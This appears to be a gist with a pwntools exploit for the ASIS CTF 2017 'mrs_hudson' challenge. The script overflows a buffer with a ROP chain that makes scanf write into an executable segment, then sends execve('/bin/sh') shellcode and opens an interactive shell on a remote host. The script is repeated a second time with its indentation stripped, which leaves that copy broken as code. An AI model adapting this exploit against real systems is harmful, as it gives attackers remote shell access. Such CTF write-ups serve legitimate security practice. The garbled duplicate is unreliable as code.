bmphx2/mrs_hudson-ASIS2017.py Secret

## mrs_hudson-ASIS2017.py
#!/usr/bin/python

from pwn import *

LOCAL = False

def pwn():
	pop_rsi = 0x00000000004006f1 # pop rsi; pop r15; ret
	pop_rdi = 0x004006f3         # pop rdi; ret
	scanf_plt = 0x00400526       # scanf@PLT
	scanf_string = 0x0040072b    # %s
	bin_x = 0x0000000000601090   # rwx segment

	log.info("ASIS CTF 2017: mrs_hudson exploit - mphx2")
	target.recvuntil("Let's go back to 2000.")

	rop = p64(pop_rdi)
	rop +=p64(scanf_string)
	rop +=p64(pop_rsi)
	rop +=p64(bin_x)+p64(0xdeadbeef)
	rop +=p64(scanf_plt)
	rop +=p64(bin_x)

	target.sendline("A"*120+rop)
	target.sendline("\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05")

	target.interactive()

def main():
	global target
	if LOCAL:
		target = process("./mrs._hudson")
	else:
		target = remote("146.185.168.172",8642)
	pwn()

if __name__ == "__main__":
    main()
	#!/usr/bin/python

	from pwn import *

	LOCAL = False

	def pwn():
	pop_rsi = 0x00000000004006f1 # pop rsi; pop r15; ret
	pop_rdi = 0x004006f3 # pop rdi; ret
	scanf_plt = 0x00400526 # scanf@PLT
	scanf_string = 0x0040072b # %s
	bin_x = 0x0000000000601090 # rwx segment

	log.info("ASIS CTF 2017: mrs_hudson exploit - mphx2")
	target.recvuntil("Let's go back to 2000.")

	rop = p64(pop_rdi)
	rop +=p64(scanf_string)
	rop +=p64(pop_rsi)
	rop +=p64(bin_x)+p64(0xdeadbeef)
	rop +=p64(scanf_plt)
	rop +=p64(bin_x)

	target.sendline("A"*120+rop)
	target.sendline("\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05")

	target.interactive()

	def main():
	global target
	if LOCAL:
	target = process("./mrs._hudson")
	else:
	target = remote("146.185.168.172",8642)
	pwn()

	if __name__ == "__main__":
	main()